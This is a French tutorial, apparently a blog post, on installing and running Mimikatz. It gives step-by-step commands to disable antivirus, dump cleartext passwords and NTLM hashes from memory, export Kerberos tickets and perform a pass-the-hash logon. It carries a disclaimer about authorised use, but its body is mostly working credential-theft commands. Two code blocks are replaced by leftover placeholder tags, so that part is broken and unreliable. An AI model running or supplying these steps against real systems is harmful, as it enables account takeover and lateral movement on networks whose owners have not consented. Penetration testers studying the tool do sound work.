Introduction

Mimikatz est un outil puissant conçu pour extraire les mots de passe, les hachages, les codes PIN et les tickets Kerberos de la mémoire en clair. Il est largement utilisé par les testeurs d’intrusion et les professionnels de la sécurité pour évaluer les vulnérabilités des systèmes. Ce guide fournit une approche pas à pas de l’installation et de l’utilisation de Mimikatz pour les tests de sécurité éthiques.

Avertissement : L’utilisation non autorisée de Mimikatz est illégale. Assurez-vous d’avoir une autorisation explicite avant de l’utiliser dans n’importe quel environnement.

Conditions préalables

Avant d’installer Mimikatz, assurez-vous que vous disposez des éléments suivants :

  • Une machine Windows (Windows 7, 10, 11 ou Server)

  • Des privilèges d’administrateur

  • Windows Defender et tout autre logiciel antivirus désactivé (Mimikatz est souvent signalé comme un logiciel malveillant)

Téléchargement de Mimikatz

Mimikatz est un outil open-source disponible sur GitHub. Pour le télécharger :

  1. Ouvrez votre navigateur web et rendez-vous à l’adresse suivante
    https://github.com/gentilkiwi/mimikatz

  2. Cliquez sur Code > Download ZIP.

  3. Extrayez le fichier ZIP dans un répertoire de votre choix.

Vous pouvez également cloner le dépôt en utilisant Git :

git clone https://github.com/gentilkiwi/mimikatz.git
#

Exécution de Mimikatz

Mimikatz nécessitant des privilèges d’administrateur, procédez comme suit :

  1. Ouvrez l’Invite de commande ou PowerShell en tant qu’administrateur.

  2. Naviguez jusqu’au dossier dans lequel vous avez extrait Mimikatz :

    cd pathtomimikatzx64
    #

  3. Lancez Mimikatz :

    mimikatz.exe
    #

Vous devriez maintenant voir l’interface de ligne de commande avec l’invite :
mimikatz ##

Commandes de base de Mimikatz

1. Vérifier les privilèges du système

Avant d’extraire les informations d’identification, vérifiez que vous disposez des privilèges suffisants :

privilege::debug
#

En cas de succès, vous devriez voir :
Privilège ’20’ OK

Extraire les mots de passe de la mémoire

Pour extraire les mots de passe stockés en mémoire, utilisez :

sekurlsa::logonpasswords
#

Cela affichera les noms d’utilisateur, les domaines et les mots de passe en clair s’ils sont disponibles.

Vider les hachages NTLM

Les hachages NTLM peuvent être utilisés pour des attaques de type “pass-the-hash”. Pour les extraire :

lsadump::sam
#

Ou pour les systèmes distants :

##ATP_NOTR_8_CODE_TAG_NOTR_ATP###

Extraction des tickets Kerberos

Pour extraire les tickets Kerberos du système :

##ATP_NOTR_9_CODE_TAG_NOTR_ATP####

Ceci exporte les fichiers .kirbi, qui peuvent être utilisés dans les attaques de type “pass-the-ticket”.

Attaque de type “pass-the-hash

Pour s’authentifier à l’aide d’un hachage NTLM au lieu d’un mot de passe :

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>
#

Conclusion

Mimikatz reste l’un des outils les plus puissants pour évaluer la sécurité des systèmes Windows en raison de sa capacité à extraire des mots de passe, des hachages et des tickets Kerberos directement à partir de la mémoire. Lorsqu’il est utilisé de manière responsable et éthique, il aide les professionnels à identifier les vulnérabilités, à vérifier les configurations de l’infrastructure du domaine et à améliorer la posture de sécurité globale d’une organisation. Toutefois, il est essentiel de se rappeler que les outils tels que Mimikatz ne doivent être utilisés qu’avec une autorisation officielle et dans des environnements contrôlés, car une utilisation non autorisée est contraire à la loi et peut avoir de graves conséquences.